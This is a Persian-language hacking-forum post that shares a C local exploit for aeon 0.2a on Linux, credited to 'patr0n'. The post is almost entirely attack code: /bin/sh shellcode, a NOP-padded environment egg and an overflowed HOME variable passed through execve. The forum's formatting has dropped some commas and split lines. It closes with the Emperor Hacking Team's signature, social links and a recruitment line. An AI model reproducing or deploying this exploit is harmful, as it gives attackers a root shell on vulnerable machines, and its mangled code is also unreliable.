اطلاعیه

Collapse
No announcement yet.

aeon 0.2a Local Linux Exploit - C code

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • aeon 0.2a Local Linux Exploit - C code

    کد PHP:
       /* first release /str0ke */
    /*
    local linux exploit within aeon-0.2a
    Coded by patr0n (security-tmp.h14.ru)
    */


    #define BUFLEN 533
    #define PATH "/home/research/aeon-0.2a/aeon"

    char shellcode[]=
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
    "\xc0\x88\x43\x07\x89\x5b\x08\x89"
    "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
    "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
    "/bin/sh"
    ;

    int main(int argcchar *argv[]) {

            
    char evilbuf[BUFLEN];
            
    int i;
            
    char *p,*av[2], *ev[3];
            
    char *egg;

            
    egg=(char *)malloc(1000);
            
    sprintf(egg"EGG=");
            
    memset(egg 40x901000-1-strlen(shellcode));
            
    sprintf(egg 1000-1-strlen(shellcode), "%s"shellcode);
        
        
    long ret=0xbfffffff-5-strlen(egg)-strlen(PATH);

            
    p=evilbuf;
            
    bzero(evilbuf,sizeof(evilbuf));
        
    strcpy(evilbuf,"HOME=");
            
            for(
    i=5;i<=BUFLEN;i+=4
            *(
    long *)(p+i)=ret
        
            
    av[0] = PATH;
            
    av[1] = 0;
            
    ev[0] = egg;
        
    ev[1] = evilbuf;
            
    ev[2] = 0;
            
    execve(*avavev);

            return 
    0;


    Emperor Hacking Team

    سکوت در جای جای مکتوبات مقدسشان به چشم می خورد و خیانتها در پی هم. اگر با آنها باشی چه خوب است.
    عاشقانه تو را بر مکتوباتشان می پذیرند و هنگامی که می خواهی با آنان نباشی ، خون تو را از آب چشمه های کوهستان گوارا تر می پندارند!

    آدرس توئیتر من:https://twitter.com/#!/iM4n_

    به صفحه شبگرد در فیسبوک بپیوندید
    http://www.facebook.com/groups/shabgard

    تیم Emperor عضو جدید میپذیرد ! برای اطلاعات بیشتر با خودم تماس بگیرید

    sigpic
Working...
X